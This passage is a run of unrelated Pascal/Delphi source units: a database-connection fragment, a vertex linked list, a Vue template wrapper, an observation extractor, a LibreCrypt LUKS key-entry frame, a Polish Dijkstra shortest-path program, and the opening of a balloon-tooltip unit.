db.Close; db.LoginPrompt := false; s := aConnectType.Servername + ':' + aConnectType.Datenbank; db.DatabaseName := s; db.Params.Add('password='+aConnectType.Passwort); db.Params.Add('user_name='+aConnectType.User); try db.Connected := true; except on E:Exception do begin AllgemeinObj.Log.DebugInfo(E.Message); if Assigned(fOnConnectionError) then fOnConnectionError(Self, e.Message); end; end; AllgemeinObj.Log.DebugInfo('Ende - CheckConnect - ' + aConnectType.Datenbank); end; procedure Tdm.dbAfterConnect(Sender: TObject); begin AllgemeinObj.Log.DebugInfo('Connect erfolgreich - ' + db.DatabaseName); if Assigned(fOnAfterConnect) then fOnAfterConnect(Self); db.Connected := false; end; end.
unit VertexList; interface uses BasicRenderingTypes; type CVertexList = class private Start,Last,Active : PVertexItem; FCount: integer; procedure Reset; function GetX: single; function GetY: single; function GetZ: single; function GetID: integer; public // Constructors and Destructors constructor Create; destructor Destroy; override; // I/O procedure LoadState(_State: PVertexItem); function SaveState:PVertexItem; // Add function Add (_ID : integer; _x,_y,_z: single): integer; procedure Delete; // Delete procedure Clear; // Misc procedure GoToFirstElement; procedure GoToNextElement; // Properties property Count: integer read FCount; property X: single read GetX; property Y: single read GetY; property Z: single read GetZ; property ID: integer read GetID; end; implementation constructor CVertexList.Create; begin Reset; end; destructor CVertexList.Destroy; begin Clear; inherited Destroy; end; procedure CVertexList.Reset; begin Start := nil; Last := nil; Active := nil; FCount := 0; end; // I/O procedure CVertexList.LoadState(_State: PVertexItem); begin Active := _State; end; function CVertexList.SaveState:PVertexItem; begin Result := Active; end; // Add function CVertexList.Add (_ID : integer; _x,_y,_z: single):integer; var Position,NewPosition : PVertexItem; begin // Ensure that no vertex will repeat. Position := Start; while (Position <> nil) do begin if Position^.x <> _x then begin Position := Position^.Next; end else if Position^.y <> _y then begin Position := Position^.Next; end else if Position^.z <> _z then begin Position := Position^.Next; end else begin Result := Position^.ID; exit; end; end; // Add vertex if it is not in the list. New(NewPosition); NewPosition^.ID := _ID; NewPosition^.x := _x; NewPosition^.y := _y; NewPosition^.z := _z; NewPosition^.Next := nil; inc(FCount); if Start <> nil then begin Last^.Next := NewPosition; end else begin Start := NewPosition; Active := Start; end; Last := NewPosition; Result := _ID; end; // Delete procedure CVertexList.Delete; var Previous : PVertexItem; begin if Active <> nil then begin Previous := Start; if Active = Start then begin Start := Start^.Next; end else begin while Previous^.Next <> Active do begin Previous := Previous^.Next; end; Previous^.Next := Active^.Next; if Active = Last then begin Last := Previous; end; end; Dispose(Active); dec(FCount); end; end; procedure CVertexList.Clear; var Garbage : PVertexItem; begin Active := Start; while Active <> nil do begin Garbage := Active; Active := Active^.Next; dispose(Garbage); end; Reset; end; // Gets function CVertexList.GetX: single; begin if Active <> nil then begin Result := Active^.x; end else begin Result := 0; end; end; function CVertexList.GetY: single; begin if Active <> nil then begin Result := Active^.y; end else begin Result := 0; end; end; function CVertexList.GetZ: single; begin if Active <> nil then begin Result := Active^.z; end else begin Result := 0; end; end; function CVertexList.GetID: integer; begin if Active <> nil then begin Result := Active^.id; end else begin Result := -1; end; end; // Misc procedure CVertexList.GoToNextElement; begin if Active <> nil then begin Active := Active^.Next; end end; procedure CVertexList.GoToFirstElement; begin Active := Start; end; end.
unit uTempl; {$mode objfpc}{$H+} {$MODESWITCH externalclass} interface uses Classes, SysUtils, Types, JS, Web, uVueJS, JComponents; type (* ╔═════════════════════════════╗ ║ TTemplate component ║ ╚═════════════════════════════╝ *) { TTemplate } TTemplate = class(TMovableControl) private { private declarations } el: TJSNode; fo: TDirectives; fdata: TJSObject; external name 'fo.data'; fmethods: TJSObject; external name 'fo.methods'; fready: JSValue; external name 'fo.ready'; fcomputed: TJSObject; external name 'fo.computed'; frun: JSValue; external name 'fo'; ftemplate: string; fEnabled: Boolean; procedure SetEnabled(AValue: Boolean); protected { protected declarations } public { public declarations } constructor Create(AOwner: TControl; TemplateName: String); property data: TJSObject read fdata write fdata; property methods: TJSObject read fmethods write fmethods; property ready: JSValue read fready write fready; property computed: TJSObject read fcomputed write fcomputed; o: TJSObject; external name 'fo'; //procedure execute; published { published declarations } { specifies whether the script is enabled } property Enabled: Boolean read FEnabled write SetEnabled default True; end; // function parseHTML(html: string): TJSNode; implementation function parseHTML(html: string): TJSNode; var t : TSJHTMLTemplateElement; begin t := TSJHTMLTemplateElement(document.createElement('template')); t.innerHTML := html; result := t.content.cloneNode(true); end; { Template1 } constructor TTemplate.Create(AOwner: TControl; TemplateName: String); begin inherited Create(AOwner); Self.ftemplate := TemplateName; el := parseHTML( {t1} Self.ftemplate ); Self.Handle.appendChild(el); fo := TDirectives.New; fo.el := '.swiper-container'; fo.methods := TJSObject.New; fo.computed:= TJSObject.New; //fo.data := TJSObject.New; InitializeObject; end; procedure TTemplate.SetEnabled(aValue: Boolean); begin if (aValue <> FEnabled) then begin if aValue then begin //FreeElement; //CreateElement; vueInstance := JVue.New ( Self.frun ); end else FEnabled := aValue; end; end; (*procedure TTemplate.execute; begin JVue.New ( Self.frun ); end;*) end.
unit ObExtractorTypes; {$mode objfpc}{$H+} interface uses Classes, SysUtils, Generics.Collections, Generics.Defaults; const MissingValue = -1e-31; type TDoubleArray = array of double; TCustomObsValue = class(TObject) ObsName: string; ObsTime: double; SimulatedValue: double; ObservedValue: double; end; TCustomWeightedObsValue = class(TCustomObsValue) Weight: double; Print: Boolean; end; TWeightedObsValueList = specialize TList<TCustomWeightedObsValue>; TCustomWeightedObsValueObjectList = specialize TObjectList<TCustomWeightedObsValue>; TCustomObsValueDictionary = specialize TDictionary<string, TCustomObsValue>; { TCustomObsExtractor } TCustomObsExtractor = class(TObject) private FOutputFileName: string; function GetObsCount: integer; procedure SetOutputFileName(AValue: string); protected FObsValueList: TWeightedObsValueList; public Constructor Create; destructor Destroy; override; property ModelOutputFileName: string read FOutputFileName write SetOutputFileName; procedure AddObs(Obs: TCustomWeightedObsValue); property ObsCount: integer read GetObsCount; procedure ExtractSimulatedValues; virtual; abstract; end; function RemoveQuotes(AString: string): string; implementation function RemoveQuotes(AString: string): string; begin Assert(Length(AString) > 0); if (AString[1] = '"') and (AString[Length(AString)] = '"') then begin AString := Copy(AString, 2, Length(AString)-2); end else if (AString[1] = '''') and (AString[Length(AString)] = '''') then begin AString := Copy(AString, 2, Length(AString)-2); end; result := AString; end; { TCustomObsExtractor } function TCustomObsExtractor.GetObsCount: integer; begin result := FObsValueList.Count; end; procedure TCustomObsExtractor.SetOutputFileName(AValue: string); begin if FOutputFileName=AValue then Exit; FOutputFileName:=AValue; end; constructor TCustomObsExtractor.Create; begin FObsValueList := TWeightedObsValueList.Create; FOutputFileName := ''; end; destructor TCustomObsExtractor.Destroy; begin FObsValueList.Free; inherited Destroy; end; procedure TCustomObsExtractor.AddObs(Obs: TCustomWeightedObsValue); begin FObsValueList.Add(Obs); end; end.
unit fmeLUKSKeyOrKeyfileEntry; interface uses Classes, Controls, Dialogs, Forms, Graphics, Messages, StdCtrls, SysUtils, Variants, Windows, //LibreCrypt ComCtrls, OTFEFreeOTFE_PasswordRichEdit, OTFEFreeOTFEBase_U, PasswordRichEdit, SDUDropFiles, SDUFilenameEdit_U, SDUFrames, SDUGeneral, SDUStdCtrls; type TfrmeLUKSKeyOrKeyfileEntry = class (TFrame) lblTreatNewlineAsEOF_1: TLabel; preUserKey: TOTFEFreeOTFE_PasswordRichEdit; rbKeyFromUser: TRadioButton; rbKeyFromKeyfile: TRadioButton; feKeyfile: TSDUFilenameEdit; ckKeyfileContainsASCII: TSDUCheckBox; cbNewlineType: TComboBox; SDUDropFiles_Keyfile: TSDUDropFiles; lblTreatNewlineAsEOF_2: TLabel; procedure rbKeyFromClick(Sender: TObject); procedure feKeyfileChange(Sender: TObject); procedure ckKeyfileContainsASCIIClick(Sender: TObject); procedure preUserKeyChange(Sender: TObject); procedure SDUDropFiles_KeyfileFileDrop(Sender: TObject; DropItem: String; DropPoint: TPoint); private procedure PopulateNewlineType(); public // FreeOTFEObj: TOTFEFreeOTFEBase; procedure Initialize(); procedure DefaultOptions(); procedure EnableDisableControls(); function GetKey(var userKey: TSDUBYtes): Boolean; function GetKeyRaw(var userKey: String): Boolean; function SetKey(userKey: PasswordString): Boolean; function SetKeyfile(filename: String): Boolean; function GetKeyfile(var filename: String): Boolean; function GetKeyfileIsASCII(var isASCII: Boolean): Boolean; function SetKeyfileIsASCII(isASCII: Boolean): Boolean; function GetKeyfileNewlineType(var nlType: TSDUNewline): Boolean; function SetKeyfileNewlineType(nlType: TSDUNewline): Boolean; function KeyIsUserEntered(): Boolean; procedure CursorToEndOfPassword(); end; //procedure Register; implementation {$R *.dfm} //procedure Register; //begin // RegisterComponents('FreeOTFE', [TfrmeLUKSKeyOrKeyfileEntry]); //end; procedure TfrmeLUKSKeyOrKeyfileEntry.feKeyfileChange(Sender: TObject); begin rbKeyFromKeyfile.Checked := True; EnableDisableControls(); end; procedure TfrmeLUKSKeyOrKeyfileEntry.preUserKeyChange(Sender: TObject); begin rbKeyFromUser.Checked := True; EnableDisableControls(); end; procedure TfrmeLUKSKeyOrKeyfileEntry.rbKeyFromClick(Sender: TObject); begin EnableDisableControls(); end; procedure TfrmeLUKSKeyOrKeyfileEntry.SDUDropFiles_KeyfileFileDrop(Sender: TObject; DropItem: String; DropPoint: TPoint); begin feKeyfile.Filename := DropItem; EnableDisableControls(); end; procedure TfrmeLUKSKeyOrKeyfileEntry.ckKeyfileContainsASCIIClick(Sender: TObject); begin EnableDisableControls(); end; procedure TfrmeLUKSKeyOrKeyfileEntry.EnableDisableControls(); begin SDUEnableControl(ckKeyfileContainsASCII, rbKeyFromKeyfile.Checked); SDUEnableControl(lblTreatNewlineAsEOF_1, (rbKeyFromKeyfile.Checked and ckKeyfileContainsASCII.Checked)); SDUEnableControl(cbNewlineType, (rbKeyFromKeyfile.Checked and ckKeyfileContainsASCII.Checked)); SDUEnableControl(lblTreatNewlineAsEOF_2, (rbKeyFromKeyfile.Checked and ckKeyfileContainsASCII.Checked)); end; procedure TfrmeLUKSKeyOrKeyfileEntry.PopulateNewlineType(); var currNewline: TSDUNewline; begin cbNewlineType.Items.Clear(); for currNewline := low(TSDUNewline) to high(TSDUNewline) do begin cbNewlineType.Items.Add(SDUNEWLINE_TITLE[currNewline]); end; end; procedure TfrmeLUKSKeyOrKeyfileEntry.Initialize(); begin PopulateNewlineType(); feKeyfile.OpenDialog.Options := feKeyfile.OpenDialog.Options + [ofDontAddToRecent]; feKeyfile.SaveDialog.Options := feKeyfile.SaveDialog.Options + [ofDontAddToRecent]; SDUDropFiles_Keyfile.Active := True; end; procedure TfrmeLUKSKeyOrKeyfileEntry.DefaultOptions(); begin preUserKey.Plaintext := True; // Linux volumes CAN NOT have newlines in the user's password preUserKey.WantReturns := False; preUserKey.WordWrap := True; preUserKey.Lines.Clear(); preUserKey.PasswordChar := GetFreeOTFEBase().PasswordChar; preUserKey.WantReturns := GetFreeOTFEBase().AllowNewlinesInPasswords; preUserKey.WantTabs := GetFreeOTFEBase().AllowTabsInPasswords; SetKeyfileIsASCII(LINUX_KEYFILE_DEFAULT_IS_ASCII); SetKeyfileNewlineType(LINUX_KEYFILE_DEFAULT_NEWLINE); rbKeyFromUser.Checked := True; end; function TfrmeLUKSKeyOrKeyfileEntry.GetKeyRaw(var userKey: String): Boolean; begin userKey := preUserkey.Text; Result := True; end; function TfrmeLUKSKeyOrKeyfileEntry.GetKey(var userKey: TSDUBYtes): Boolean; var keyfileIsASCII: Boolean; keyfileNewlineType: TSDUNewline; begin Result := False; if rbKeyFromUser.Checked then begin { TODO 1 -otdk -cfix : warn user about losing unicde chars } userKey := SDUStringToSDUBytes(preUserkey.Text); Result := True; end else begin if (feKeyfile.Filename <> '') then begin GetKeyfileIsASCII(keyfileIsASCII); GetKeyfileNewlineType(keyfileNewlineType); Result := GetFreeOTFEBase().ReadLUKSKeyFromFile(feKeyfile.Filename, keyfileIsASCII, keyfileNewlineType, userKey); end; end; end; function TfrmeLUKSKeyOrKeyfileEntry.SetKey(userKey: PasswordString): Boolean; begin preUserkey.Text := userKey; Result := True; end; function TfrmeLUKSKeyOrKeyfileEntry.SetKeyfile(filename: String): Boolean; begin feKeyfile.Filename := filename; Result := True; end; function TfrmeLUKSKeyOrKeyfileEntry.GetKeyfile(var filename: String): Boolean; begin filename := feKeyfile.Filename; Result := True; end; function TfrmeLUKSKeyOrKeyfileEntry.GetKeyfileIsASCII(var isASCII: Boolean): Boolean; begin isASCII := ckKeyfileContainsASCII.Checked; Result := True; end; function TfrmeLUKSKeyOrKeyfileEntry.SetKeyfileIsASCII(isASCII: Boolean): Boolean; begin ckKeyfileContainsASCII.Checked := isASCII; Result := True; end; function TfrmeLUKSKeyOrKeyfileEntry.GetKeyfileNewlineType( var nlType: TSDUNewline): Boolean; var currNewline: TSDUNewline; begin Result := False; for currNewline := low(TSDUNewline) to high(TSDUNewline) do begin if (cbNewlineType.Items[cbNewlineType.ItemIndex] = SDUNEWLINE_TITLE[currNewline]) then begin nlType := currNewline; Result := True; break; end; end; end; function TfrmeLUKSKeyOrKeyfileEntry.SetKeyfileNewlineType(nlType: TSDUNewline): Boolean; var idx: Integer; begin idx := cbNewlineType.Items.IndexOf(SDUNEWLINE_TITLE[nlType]); cbNewlineType.ItemIndex := idx; Result := (idx >= 0); end; function TfrmeLUKSKeyOrKeyfileEntry.KeyIsUserEntered(): Boolean; begin Result := rbKeyFromUser.Checked; end; procedure TfrmeLUKSKeyOrKeyfileEntry.CursorToEndOfPassword(); begin // Position cufrmeLUKSKeyOrKeyfileEntry preUserKey.SelStart := length(preUserKey.Text); end; end.
program siecprzeplywowa; uses SysUtils; const INPUT_FILE_FLAG = '-i'; OUTPUT_FILE_FLAG = '-o'; START_NODE_FLAG = '-s'; END_NODE_FLAG = '-k'; INFINITY = High(integer); SPACE = ' '; DOUBLE_SPACE = SPACE + SPACE; SEMICOLON = ';'; SEMICOLON_WITH_SPACE = SEMICOLON + SPACE; type ArrayOfString = array of string; NodePointer = ^Node; Edge = record endNode: NodePointer; distanceToEndNode: integer; end; Node = record id: integer; distance: integer; edges: array of Edge; end; NodesListPointer = ^NodesList; NodesList = record node: NodePointer; nextElement: NodesListPointer; end; var i: integer; nodesListHead: NodesListPointer = nil; function createNode(id: integer; edgesCount: integer): NodePointer; begin new(createNode); createNode^.id := id; SetLength(createNode^.edges, edgesCount); end; function hasNextNode(listOfNodes: NodesListPointer): boolean; begin hasNextNode := listOfNodes^.nextElement^.node <> nil; end; function hasExpectedCommandLineOptionsCount(): boolean; const EXPECTED_FLAGS_COUNT = 4; EXPECTED_FLAGS_ARGUMENTS_COUNT = 4; EXPECTED_OPTIONS_COUNT = EXPECTED_FLAGS_COUNT + EXPECTED_FLAGS_ARGUMENTS_COUNT; begin hasExpectedCommandLineOptionsCount := Paramcount = EXPECTED_OPTIONS_COUNT; end; function getArgumentByFlag(flag: string): string; begin for i := 1 to Paramcount - 1 do if flag = ParamStr(i) then begin getArgumentByFlag := ParamStr(i + 1); break; end; end; function getValueOf(aString: string): integer; begin val(aString, getValueOf); end; function toString(anInteger: integer): string; begin Str(anInteger, toString); end; function getStartNodeId(): integer; begin getStartNodeId := getValueOf(getArgumentByFlag(START_NODE_FLAG)); end; function getEndNodeId(): integer; begin getEndNodeId := getValueOf(getArgumentByFlag(END_NODE_FLAG)); end; function getInputFilePath(): string; begin getInputFilePath := getArgumentByFlag(INPUT_FILE_FLAG); end; function getOutputFileName(): string; begin getOutputFileName := getArgumentByFlag(OUTPUT_FILE_FLAG); end; function containsSubstringInString(aSubstring: string; aString: string): boolean; begin containsSubstringInString := pos(aSubstring, aString) <> 0; end; function containsSubstringInStringCaseInsensitively(aSubstring: string; aString: string): boolean; begin containsSubstringInStringCaseInsensitively := containsSubstringInString(LowerCase(aSubstring), LowerCase(aString)); end; function getCommandLineOptionsAsString(): string; begin for i := 1 to Paramcount do getCommandLineOptionsAsString := getCommandLineOptionsAsString + ' ' + ParamStr(i); end; function hasExpectedCommandLineFlags(): boolean; var commandLineOptions: string; expectedFlags: array[1..4] of string = (INPUT_FILE_FLAG, OUTPUT_FILE_FLAG, START_NODE_FLAG, END_NODE_FLAG); begin hasExpectedCommandLineFlags := True; commandLineOptions := getCommandLineOptionsAsString(); for i := 1 to High(expectedFlags) do if not containsSubstringInStringCaseInsensitively(expectedFlags[i] + SPACE, commandLineOptions) then begin writeln('Przelacznik "', expectedFlags[i], '" nie zostal uzyty.'); hasExpectedCommandLineFlags := False; break; end; end; function isAnExistingFile(filePath: string): boolean; begin isAnExistingFile := FileExists(filePath); end; function isValidFilename(filename: string): boolean; var illegalCharacters: array[1..9] of char = ('*', ':', '?', '"', '<', '>', '|', '/', '\'); begin isValidFilename := True; for i := 1 to High(illegalCharacters) do if containsSubstringInString(illegalCharacters[i], filename) then begin isValidFilename := False; break; end; end; function countFileLines(filePath: string): integer; var fileContent: Text; begin countFileLines := 0; Assign(fileContent, filePath); Reset(fileContent); repeat ReadLn(fileContent); Inc(countFileLines); until EOF(fileContent); Close(fileContent); end; function getNodesCount(): integer; begin getNodesCount := countFileLines(getInputFilePath()); end; function isPointingToAnExistingNode(nodeId: integer): boolean; begin isPointingToAnExistingNode := nodeId <= getNodesCount(); end; function hasCommandLineFlagsArgumentsSetCorrectly(): boolean; begin hasCommandLineFlagsArgumentsSetCorrectly := False; if not isAnExistingFile(getInputFilePath()) then writeln('Podana sciezka "', getInputFilePath(), '" wskazuje na nieistniejacy plik.') else if not isValidFilename(getOutputFileName()) then writeln('Podana nazwa "', getOutputFileName(), '" nie moze byc uzyta jako nazwa pliku.') else if not isPointingToAnExistingNode(getStartNodeId()) then writeln('Wezel numer ', getStartNodeId(), ' nie moze byc uzyty jako startowy, bo nie zostal zadeklarowany.') else if not isPointingToAnExistingNode(getEndNodeId()) then writeln('Wezel numer ', getEndNodeId(), ' nie moze byc uzyty jako koncowy, bo nie zostal zadeklarowany.') else hasCommandLineFlagsArgumentsSetCorrectly := True; end; function hasCommandLineOptionsSetCorrectly(): boolean; begin hasCommandLineOptionsSetCorrectly := False; if not hasExpectedCommandLineOptionsCount() then writeln('Przerwano. Nieoczekiwana ilosc parametrow.') else if not hasExpectedCommandLineFlags() then writeln('Przerwano. Nie uzyto wszystkich oczekiwanych przelacznikow.') else if not hasCommandLineFlagsArgumentsSetCorrectly() then writeln('Przerwano. Bledne ustawienie wartosci przelacznikow.') else hasCommandLineOptionsSetCorrectly := True; end; function isEmpty(aString: string): boolean; begin isEmpty := Length(aString) = 0; end; function countEmptyStringOccurrences(anArrayOfString: ArrayOfString): integer; var aString: string; begin countEmptyStringOccurrences := 0; for aString in anArrayOfString do if isEmpty(aString) then Inc(countEmptyStringOccurrences); end; function trimArray(anArrayOfString: ArrayOfString): ArrayOfString; var aString: string; begin SetLength(trimArray, Length(anArrayOfString) - countEmptyStringOccurrences(anArrayOfString)); i := 0; for aString in anArrayOfString do if not isEmpty(aString) then begin trimArray[i] := aString; Inc(i); end; end; function replaceAll(aString, replacedSubstring, replacingSubstring: string): string; begin replaceAll := StringReplace(aString, replacedSubstring, replacingSubstring, [rfReplaceAll, rfIgnoreCase]); end; function removeMultipleSpaces(aString: string): string; begin while containsSubstringInString(DOUBLE_SPACE, aString) do aString := replaceAll(aString, DOUBLE_SPACE, SPACE); removeMultipleSpaces := aString; end; function removeSpacesAfterSemicolons(aString: string): string; begin removeSpacesAfterSemicolons := replaceAll(aString, SEMICOLON_WITH_SPACE, SEMICOLON); end; function trimNodeDefinition(aString: string): string; begin trimNodeDefinition := removeSpacesAfterSemicolons(removeMultipleSpaces(aString)); end; function getNodesDefinitions(): ArrayOfString; var fileContent: Text; begin SetLength(getNodesDefinitions, getNodesCount()); Assign(fileContent, getInputFilePath()); Reset(fileContent); i := 0; repeat ReadLn(fileContent, getNodesDefinitions[i]); getNodesDefinitions[i] := trimNodeDefinition(getNodesDefinitions[i]); Inc(i); until EOF(fileContent); Close(fileContent); end; function isAnInteger(aString: string): boolean; var errorCode: integer; assignedButNeverUsedIntegerValue: integer; begin val(aString, assignedButNeverUsedIntegerValue, errorCode); isAnInteger := errorCode = 0; end; function countCharOccurrencesInString(suspect: char; container: string): integer; var c: char; begin countCharOccurrencesInString := 0; for c in container do if c = suspect then Inc(countCharOccurrencesInString); end; function splitStringByChar(separator: char; aString: string): ArrayOfString; var letter: char; begin i := 0; SetLength(splitStringByChar, countCharOccurrencesInString(separator, aString) + 1); for letter in aString do if letter = separator then Inc(i) else splitStringByChar[i] := splitStringByChar[i] + letter; end; function getNodeConnections(nodeDefinition: string): ArrayOfString; begin getNodeConnections := trimArray(splitStringByChar(SEMICOLON, nodeDefinition)); end; function getNodeConnectionData(nodeConnection: string): ArrayOfString; begin getNodeConnectionData := trimArray(splitStringByChar(SPACE, nodeConnection)); end; function isUnderstandableNodeDefinition(nodeDefinition: string): boolean; var nodeConnection: string; nodeConnectionData: ArrayOfString; endNodeIdString: string; distanceToEndNodeString: string; nodeId: integer = 1; begin isUnderstandableNodeDefinition := True; for nodeConnection in getNodeConnections(nodeDefinition) do begin nodeConnectionData := getNodeConnectionData(nodeConnection); endNodeIdString := nodeConnectionData[0]; distanceToEndNodeString := nodeConnectionData[1]; if length(nodeConnectionData) <> 2 then writeln('Niezrozumiale polaczenie ', nodeId, ' wezla: "', nodeConnection, '". Niepoprawna ilosc parametrow.') else if not isAnInteger(endNodeIdString) then writeln('Wezel ', nodeId, ' nie moze zostac polaczony z wezlem "', endNodeIdString, '". Identyfikatory wezlow musza byc liczba calkowita!') else if not isPointingToAnExistingNode(getValueOf(endNodeIdString)) then writeln('Wezel ', nodeId, ' nie moze zostac polaczony z wezlem ', endNodeIdString, ' bo nie istnieje!') else if not isAnInteger(distanceToEndNodeString) then writeln('Wezel ', nodeId, ' nie moze zostac polaczony z wezlem ', endNodeIdString, ' dystansem "', distanceToEndNodeString, '". Dystans miedzy wezlami musi byc liczba calkowita!') else Continue; isUnderstandableNodeDefinition := False; break; end; end; function areUnderstandableNodesDefinitions(nodesDefinitions: ArrayOfString): boolean; var nodeDefinition: string; begin areUnderstandableNodesDefinitions := True; for nodeDefinition in nodesDefinitions do begin if not isUnderstandableNodeDefinition(nodeDefinition) then begin writeln('Przerwano. Niezrozumiala definicja wezla: "', nodeDefinition, '"'); areUnderstandableNodesDefinitions := False; break; end; end; end; function createNodeByDefinition(nodeId: integer; nodeDefinition: string): NodePointer; var edgesSize: integer; begin edgesSize := Length(getNodeConnections(nodeDefinition)); createNodeByDefinition := createNode(nodeId, edgesSize); end; procedure appendNodesList(var nodesListHead: NodesListPointer; nodeToBeAdded: NodePointer); var nodesListElement: NodesListPointer = nil; begin new(nodesListElement); nodesListElement^.node := nodeToBeAdded; nodesListElement^.nextElement := nodesListHead; nodesListHead := nodesListElement; end; procedure createNodesInNodesListByTheirDefinitions(var nodesListHead: NodesListPointer; nodesDefinitions: ArrayOfString); var nodeDefinition: string; nodeId: integer = 1; begin for nodeDefinition in nodesDefinitions do begin appendNodesList(nodesListHead, createNodeByDefinition(nodeId, nodeDefinition)); Inc(nodeId); end; end; function isEndOfList(nodesList: NodesListPointer): boolean; begin isEndOfList := nodesList = nil; end; function findNodeInNodesListById(nodesList: NodesListPointer; nodeId: integer): NodePointer; begin findNodeInNodesListById := nil; while not isEndOfList(nodesList) do begin if nodesList^.node^.id = nodeId then begin findNodeInNodesListById := nodesList^.node; break; end; nodesList := nodesList^.nextElement; end; end; function getConnectionEndNodeId(nodeConnection: string): integer; begin getConnectionEndNodeId := getValueOf(getNodeConnectionData(nodeConnection)[0]); end; function getConnectionDistanceToEndNode(nodeConnection: string): integer; begin getConnectionDistanceToEndNode := getValueOf(getNodeConnectionData(nodeConnection)[1]); end; procedure establishConnectionsForNode(aNode: NodePointer; nodeConnections: ArrayOfString); var edgesIndex: integer; nodeConnection: string; distanceToEndNode: integer; endNodeId: integer; begin edgesIndex := 0; for nodeConnection in nodeConnections do begin endNodeId := getConnectionEndNodeId(nodeConnection); distanceToEndNode := getConnectionDistanceToEndNode(nodeConnection); aNode^.edges[edgesIndex].endNode := findNodeInNodesListById(nodesListHead, endNodeId); aNode^.edges[edgesIndex].distanceToEndNode := distanceToEndNode; Inc(edgesIndex); end; end; procedure establishConnectionsForNodesInNodesListByDefinitions(nodesList: NodesListPointer; nodesDefinitions: ArrayOfString); var nodeConnections: ArrayOfString; aNode: NodePointer; nodeDefinition: string; begin while not isEndOfList(nodesList) do begin aNode := nodesList^.node; nodeDefinition := nodesDefinitions[aNode^.id - 1]; nodeConnections := getNodeConnections(nodeDefinition); establishConnectionsForNode(aNode, nodeConnections); nodesList := nodesList^.nextElement; end; end; function findNodeWithLowestDistanceInNodesList(nodesList: NodesListPointer): NodePointer; var aNode: NodePointer; lowestDistance: integer; begin lowestDistance := nodesList^.node^.distance; findNodeWithLowestDistanceInNodesList := nodesList^.node; while not isEndOfList(nodesList) do begin aNode := nodesList^.node; if lowestDistance > aNode^.distance then begin lowestDistance := aNode^.distance; findNodeWithLowestDistanceInNodesList := aNode; end; nodesList := nodesList^.nextElement; end; end; procedure setInfinityDistanceForEachNodeInNodesList(nodesList: NodesListPointer); begin while not isEndOfList(nodesList) do begin nodesList^.node^.distance := INFINITY; nodesList := nodesList^.nextElement; end; end; procedure removeFromNodesList(var nodesList: NodesListPointer; nodeToBeRemoved: NodePointer); var nodesListCopy: NodesListPointer; previousNodesListElement: NodesListPointer = nil; begin nodesListCopy := nodesList; while not isEndOfList(nodesList) do begin if nodesList^.node^.id = nodeToBeRemoved^.id then begin if previousNodesListElement = nil then begin nodesList := nil; break; end; previousNodesListElement^.nextElement := nodesList^.nextElement; nodesList := nodesListCopy; break; end; previousNodesListElement := nodesList; nodesList := nodesList^.nextElement; end; end; procedure saveCalculationsResults(shortestPath: string; totalDistance: integer); var fileContent: Text; begin Assign(fileContent, getOutputFileName()); Rewrite(fileContent); writeln(fileContent, shortestPath); writeln(fileContent, totalDistance); Close(fileContent); end; procedure calculateShortestPathAndSaveResults(nodesListHead: NodesListPointer); var trail: array of integer; evaluationNode: NodePointer; startNode: NodePointer; unvisitedNodes: NodesListPointer; totalDistanceToEndNode: integer = 0; anEdge: Edge; procedure leaveATrail(startNode: NodePointer; endNode: NodePointer); begin trail[endNode^.id] := startNode^.id; end; function getTrailForNode(nodeId: integer): string; var i: integer = 0; begin i := nodeId; getTrailForNode := toString(getEndNodeId()); while i <> getStartNodeId() do begin getTrailForNode := toString(trail[i]) + ' ' + getTrailForNode; i := trail[i]; end; end; begin SetLength(trail, getNodesCount()); setInfinityDistanceForEachNodeInNodesList(nodesListHead); unvisitedNodes := nil; startNode := findNodeInNodesListById(nodesListHead, getStartNodeId()); startNode^.distance := 0; appendNodesList(unvisitedNodes, startNode); while not isEndOfList(unvisitedNodes) do begin evaluationNode := findNodeWithLowestDistanceInNodesList(unvisitedNodes); if evaluationNode^.id = getEndNodeId() then begin saveCalculationsResults(getTrailForNode(getEndNodeId()), evaluationNode^.distance); break; end; removeFromNodesList(unvisitedNodes, evaluationNode); for anEdge in evaluationNode^.edges do begin totalDistanceToEndNode := evaluationNode^.distance + anEdge.distanceToEndNode; if anEdge.endNode^.distance > totalDistanceToEndNode then begin anEdge.endNode^.distance := totalDistanceToEndNode; leaveATrail(evaluationNode, anEdge.endNode); appendNodesList(unvisitedNodes, anEdge.endNode); end; end; end; end; procedure disposeList(nodesListHead: NodesListPointer); var nodesListElement: NodesListPointer; begin while not isEndOfList(nodesListHead) do begin nodesListElement := nodesListHead^.nextElement; nodesListHead := nodesListElement; Dispose(nodesListElement); end; end; var nodesDefinitions: ArrayOfString; begin if hasCommandLineOptionsSetCorrectly() then begin nodesDefinitions := getNodesDefinitions(); if areUnderstandableNodesDefinitions(nodesDefinitions) then begin createNodesInNodesListByTheirDefinitions(nodesListHead, nodesDefinitions); establishConnectionsForNodesInNodesListByDefinitions(nodesListHead, nodesDefinitions); calculateShortestPathAndSaveResults(nodesListHead); end; end; disposeList(nodesListHead); writeln('Nacisnij enter aby zakonczyc.'); readln(); end.
{ Balloon - using Balloon-shaped windows in your Delphi programs Copyright (C) 2003 JWB Software Web: http://people.zeelandnet.nl/famboek/delphi/ Email: jwbsoftware@zeelandnet.nl } Unit Balloon; Interface Uses Types, Forms, Classes, Controls, StdCtrls, ExtCtrls, Windows, Graphics, Messages, SysUtils; Type TBalloonType = (blnNone, blnInfo, blnError, blnWarning); TBalloonHoriz = (blnLeft, blnMiddle, blnRight); TBalloonVert = (blnTop, blnCenter, blnBottom); TBalloonPosition = (blnArrowTopLeft, blnArrowTopRight, blnArrowBottomLeft, blnArrowBottomRight); Type TBalloon = Class(TCustomForm) private lblTitle: TLabel; lblText: TLabel; pnlAlign: TPanel; iconBitmap: TImage; tmrExit: TTimer; FOnRelease: TNotifyEvent; Procedure FormPaint(Sender: TObject); protected Procedure CreateParams(Var Params: TCreateParams); override; Procedure OnMouseClick(Sender: TObject); Procedure OnExitTimerEvent(Sender: TObject); Procedure OnChange(Sender: TObject); Procedure WndProc(Var Message: TMessage); override; procedure DoRelease; public property OnRelease: TNotifyEvent read FOnRelease write FOnRelease; Constructor CreateNew(AOwner: TComponent; Dummy: Integer = 0); override; Procedure ShowBalloon(blnLeft, blnTop: Integer; blnTitle, blnText: String; blnType: TBalloonType; blnDuration: Integer; blnPosition: TBalloonPosition); Procedure ShowControlBalloon(blnControl: TWinControl; blnHoriz: TBalloonHoriz; blnVert: TBalloonVert; blnTitle, blnText: String; blnType: TBalloonType; blnDuration: Integer); End; Type TBalloonControl = Class(TComponent) private FTitle: String; FText: TStringList; FDuration, FPixelCoordinateX, FPixelCoordinateY: Integer; FHorizontal: TBalloonHoriz; FVertical: 